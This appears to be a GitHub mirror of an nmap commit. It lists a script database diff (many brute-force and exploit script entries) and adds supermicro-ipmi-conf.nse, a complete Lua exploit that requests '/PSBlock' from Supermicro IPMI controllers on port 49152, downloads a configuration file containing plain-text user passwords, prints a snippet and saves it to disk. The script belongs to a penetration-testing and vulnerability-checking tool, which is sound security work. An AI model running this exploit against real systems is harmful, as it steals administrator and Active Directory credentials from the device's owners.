mirror of
https://github.com/nmap/nmap.git
synced 2025-12-08 21:51:28 +00:00
Adds supermicro-ipmi-conf.nse. Nominated for a Pwnie for Best Server-Side Bug at BH.
This commit is contained in:
paulino
@@ -236,248 +236,3 @@ Entry { filename = "http-vuln-cve2014-2129.nse", categories = { "safe", "vuln",
|
||||
Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
|
||||
Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "http-waf-fingerprint.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "http-wordpress-enum.nse", categories = { "auth", "intrusive", "vuln", } }
|
||||
Entry { filename = "http-wordpress-plugins.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "http-xssed.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "iax2-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "iax2-version.nse", categories = { "version", } }
|
||||
Entry { filename = "icap-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ike-version.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "imap-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "imap-capabilities.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "informix-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "informix-query.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "informix-tables.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "ip-forwarding.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ip-geolocation-geobytes.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "ip-geolocation-geoplugin.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "ip-geolocation-ipinfodb.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "ip-geolocation-maxmind.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "ipidseq.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ipv6-node-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ipv6-ra-flood.nse", categories = { "dos", "intrusive", } }
|
||||
Entry { filename = "irc-botnet-channels.nse", categories = { "discovery", "safe", "vuln", } }
|
||||
Entry { filename = "irc-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "irc-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "irc-sasl-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
|
||||
Entry { filename = "iscsi-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "iscsi-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "isns-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "jdwp-exec.nse", categories = { "exploit", "intrusive", } }
|
||||
Entry { filename = "jdwp-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "jdwp-inject.nse", categories = { "exploit", "intrusive", } }
|
||||
Entry { filename = "jdwp-version.nse", categories = { "version", } }
|
||||
Entry { filename = "krb5-enum-users.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "ldap-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "ldap-novell-getpass.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ldap-rootdse.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ldap-search.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "lexmark-config.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "llmnr-resolve.nse", categories = { "broadcast", "discovery", "safe", } }
|
||||
Entry { filename = "lltd-discovery.nse", categories = { "broadcast", "discovery", "safe", } }
|
||||
Entry { filename = "maxdb-info.nse", categories = { "default", "version", } }
|
||||
Entry { filename = "mcafee-epo-agent.nse", categories = { "safe", "version", } }
|
||||
Entry { filename = "membase-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "membase-http-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "memcached-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "metasploit-info.nse", categories = { "intrusive", "safe", } }
|
||||
Entry { filename = "metasploit-msgrpc-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "metasploit-xmlrpc-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mikrotik-routeros-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mmouse-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mmouse-exec.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "modbus-discover.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "mongodb-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mongodb-databases.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "mongodb-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "mrinfo.nse", categories = { "broadcast", "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "ms-sql-config.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-dac.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-empty-password.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "ms-sql-hasdbaccess.nse", categories = { "auth", "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-query.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-tables.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ms-sql-xp-cmdshell.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "msrpc-enum.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "mtrace.nse", categories = { "broadcast", "discovery", "safe", } }
|
||||
Entry { filename = "murmur-version.nse", categories = { "version", } }
|
||||
Entry { filename = "mysql-audit.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "mysql-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mysql-databases.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "mysql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } }
|
||||
Entry { filename = "mysql-empty-password.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "mysql-enum.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "mysql-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "mysql-query.nse", categories = { "auth", "discovery", "safe", } }
|
||||
Entry { filename = "mysql-users.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "mysql-variables.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "mysql-vuln-cve2012-2122.nse", categories = { "discovery", "intrusive", "vuln", } }
|
||||
Entry { filename = "nat-pmp-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "nat-pmp-mapport.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "nbstat.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ncp-enum-users.nse", categories = { "auth", "safe", } }
|
||||
Entry { filename = "ncp-serverinfo.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ndmp-fs-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "ndmp-version.nse", categories = { "version", } }
|
||||
Entry { filename = "nessus-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "nessus-xmlrpc-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "netbus-auth-bypass.nse", categories = { "auth", "safe", "vuln", } }
|
||||
Entry { filename = "netbus-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "netbus-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "netbus-version.nse", categories = { "version", } }
|
||||
Entry { filename = "nexpose-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "nfs-ls.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "nfs-showmount.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "nfs-statfs.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "nping-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "nrpe-enum.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "ntp-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ntp-monlist.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "omp2-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "omp2-enum-targets.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "openlookup-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "openvas-otp-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "oracle-brute-stealth.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "oracle-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "oracle-enum-users.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "oracle-sid-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "ovs-agent-version.nse", categories = { "version", } }
|
||||
Entry { filename = "p2p-conficker.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "path-mtu.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "pcanywhere-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "pgsql-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "pjl-ready-message.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "pop3-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "pop3-capabilities.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "pptp-version.nse", categories = { "version", } }
|
||||
Entry { filename = "qconn-exec.nse", categories = { "exploit", "intrusive", "vuln", } }
|
||||
Entry { filename = "qscan.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "quake1-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "quake3-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "quake3-master-getservers.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "rdp-enum-encryption.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "rdp-vuln-ms12-020.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "realvnc-auth-bypass.nse", categories = { "auth", "default", "safe", } }
|
||||
Entry { filename = "redis-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "redis-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "resolveall.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "reverse-index.nse", categories = { "safe", } }
|
||||
Entry { filename = "rexec-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "rfc868-time.nse", categories = { "discovery", "safe", "version", } }
|
||||
Entry { filename = "riak-http-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "rlogin-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "rmi-dumpregistry.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "rmi-vuln-classloader.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "rpc-grind.nse", categories = { "version", } }
|
||||
Entry { filename = "rpcap-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "rpcap-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "rpcinfo.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "s7-info.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "sip-call-spoof.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "sip-methods.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "skypev2-version.nse", categories = { "version", } }
|
||||
Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "smb-check-vulns.nse", categories = { "dos", "exploit", "intrusive", "vuln", } }
|
||||
Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } }
|
||||
Entry { filename = "smb-flood.nse", categories = { "dos", "intrusive", } }
|
||||
Entry { filename = "smb-ls.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "smb-mbenum.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "smb-print-text.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "smb-psexec.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "smb-security-mode.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "smb-server-stats.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-system-info.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "smb-vuln-ms10-054.nse", categories = { "dos", "intrusive", "vuln", } }
|
||||
Entry { filename = "smb-vuln-ms10-061.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "smbv2-enabled.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "smtp-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "smtp-commands.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "smtp-enum-users.nse", categories = { "auth", "external", "intrusive", } }
|
||||
Entry { filename = "smtp-open-relay.nse", categories = { "discovery", "external", "intrusive", } }
|
||||
Entry { filename = "smtp-strangeport.nse", categories = { "malware", "safe", } }
|
||||
Entry { filename = "smtp-vuln-cve2010-4344.nse", categories = { "exploit", "intrusive", "vuln", } }
|
||||
Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } }
|
||||
Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "snmp-hh3c-logins.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } }
|
||||
Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-processes.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-sysdescr.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-win32-services.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-win32-shares.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-win32-software.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "snmp-win32-users.nse", categories = { "auth", "default", "safe", } }
|
||||
Entry { filename = "socks-auth-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "socks-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "socks-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } }
|
||||
Entry { filename = "ssh-hostkey.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ssh2-enum-algos.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "sshv1.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "ssl-ccs-injection.nse", categories = { "safe", "vuln", } }
|
||||
Entry { filename = "ssl-cert.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ssl-date.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "ssl-enum-ciphers.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "ssl-google-cert-catalog.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "ssl-heartbleed.nse", categories = { "safe", "vuln", } }
|
||||
Entry { filename = "ssl-known-key.nse", categories = { "default", "discovery", "safe", "vuln", } }
|
||||
Entry { filename = "sslv2.nse", categories = { "default", "safe", } }
|
||||
Entry { filename = "sstp-discover.nse", categories = { "default", "discovery", } }
|
||||
Entry { filename = "stun-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "stun-version.nse", categories = { "version", } }
|
||||
Entry { filename = "stuxnet-detect.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "svn-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "targets-asn.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "targets-ipv6-multicast-echo.nse", categories = { "broadcast", "discovery", } }
|
||||
Entry { filename = "targets-ipv6-multicast-invalid-dst.nse", categories = { "broadcast", "discovery", } }
|
||||
Entry { filename = "targets-ipv6-multicast-mld.nse", categories = { "broadcast", "discovery", } }
|
||||
Entry { filename = "targets-ipv6-multicast-slaac.nse", categories = { "broadcast", "discovery", } }
|
||||
Entry { filename = "targets-sniffer.nse", categories = { "broadcast", "discovery", "safe", } }
|
||||
Entry { filename = "targets-traceroute.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "teamspeak2-version.nse", categories = { "version", } }
|
||||
Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "telnet-encryption.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "tftp-enum.nse", categories = { "discovery", "intrusive", } }
|
||||
Entry { filename = "tls-nextprotoneg.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "traceroute-geolocation.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "unittest.nse", categories = { "safe", } }
|
||||
Entry { filename = "unusual-port.nse", categories = { "safe", } }
|
||||
Entry { filename = "upnp-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "url-snarf.nse", categories = { "safe", } }
|
||||
Entry { filename = "ventrilo-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "versant-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "vmauthd-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "vnc-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "vnc-info.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "voldemort-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "vuze-dht-info.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "wdb-version.nse", categories = { "default", "discovery", "version", "vuln", } }
|
||||
Entry { filename = "weblogic-t3-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
Entry { filename = "whois-domain.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "whois-ip.nse", categories = { "discovery", "external", "safe", } }
|
||||
Entry { filename = "wsdd-discover.nse", categories = { "default", "discovery", "safe", } }
|
||||
Entry { filename = "x11-access.nse", categories = { "auth", "default", "safe", } }
|
||||
Entry { filename = "xdmcp-discover.nse", categories = { "discovery", "safe", } }
|
||||
Entry { filename = "xmpp-brute.nse", categories = { "brute", "intrusive", } }
|
||||
Entry { filename = "xmpp-info.nse", categories = { "default", "discovery", "safe", "version", } }
|
||||
|
||||
95
scripts/supermicro-ipmi-conf.nse
Normal file
95
scripts/supermicro-ipmi-conf.nse
Normal file
@@ -0,0 +1,95 @@
|
||||
description = [[
|
||||
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
|
||||
|
||||
The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains users with their passwords in plain text.
|
||||
|
||||
References:
|
||||
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
|
||||
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
|
||||
]]
|
||||
|
||||
---
|
||||
-- @usage nmap -p49152 --script supermicro-ipmi-conf <target>
|
||||
--
|
||||
-- @output
|
||||
-- PORT STATE SERVICE REASON
|
||||
-- 49152/tcp open unknown syn-ack
|
||||
-- | supermicro-ipmi-conf:
|
||||
-- | VULNERABLE:
|
||||
-- | Supermicro IPMI/BMC configuration file disclosure
|
||||
-- | State: VULNERABLE (Exploitable)
|
||||
-- | Description:
|
||||
-- | Some Supermicro IPMI/BMC controllers allow attackers to download
|
||||
-- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|
||||
-- | network's Active Directory.
|
||||
-- | Disclosure date: 2014-06-19
|
||||
-- | Extra information:
|
||||
-- | Snippet from configuration file:
|
||||
-- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|
||||
-- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|
||||
-- |
|
||||
-- | References:
|
||||
-- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
|
||||
--
|
||||
-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
|
||||
---
|
||||
|
||||
author = "Paulino Calderon <calderon () websec mx>"
|
||||
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
|
||||
categories = {"exploit","vuln"}
|
||||
|
||||
local http = require "http"
|
||||
local nmap = require "nmap"
|
||||
local shortport = require "shortport"
|
||||
local string = require "string"
|
||||
local vulns = require "vulns"
|
||||
local stdnse = require "stdnse"
|
||||
|
||||
portrule = shortport.portnumber(49152, "tcp")
|
||||
|
||||
---
|
||||
--Writes string to file
|
||||
local function write_file(filename, contents)
|
||||
local f, err = io.open(filename, "w")
|
||||
if not f then
|
||||
return f, err
|
||||
end
|
||||
f:write(contents)
|
||||
f:close()
|
||||
return true
|
||||
end
|
||||
|
||||
action = function(host, port)
|
||||
local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf"
|
||||
local vuln = {
|
||||
title = 'Supermicro IPMI/BMC configuration file disclosure',
|
||||
state = vulns.STATE.NOT_VULN,
|
||||
description = [[
|
||||
Some Supermicro IPMI/BMC controllers allow attackers to download
|
||||
a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|
||||
network's Active Directory.]],
|
||||
references = {
|
||||
'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/',
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2014', month = '06', day = '19'},
|
||||
},
|
||||
}
|
||||
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
local open_session = http.get(host.ip, port, "/PSBlock")
|
||||
if open_session and open_session.status ==200 and string.len(open_session.body)>200 then
|
||||
s = open_session.body:gsub("%z", ".")
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)
|
||||
local status, err = write_file(fw,s)
|
||||
if status then
|
||||
extra_info = string.format("\nConfiguration file saved to '%s'\n", fw)
|
||||
else
|
||||
stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err)
|
||||
end
|
||||
|
||||
vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info
|
||||
end
|
||||
return vuln_report:make_output(vuln)
|
||||
end
|
||||
Reference in New Issue
Block a user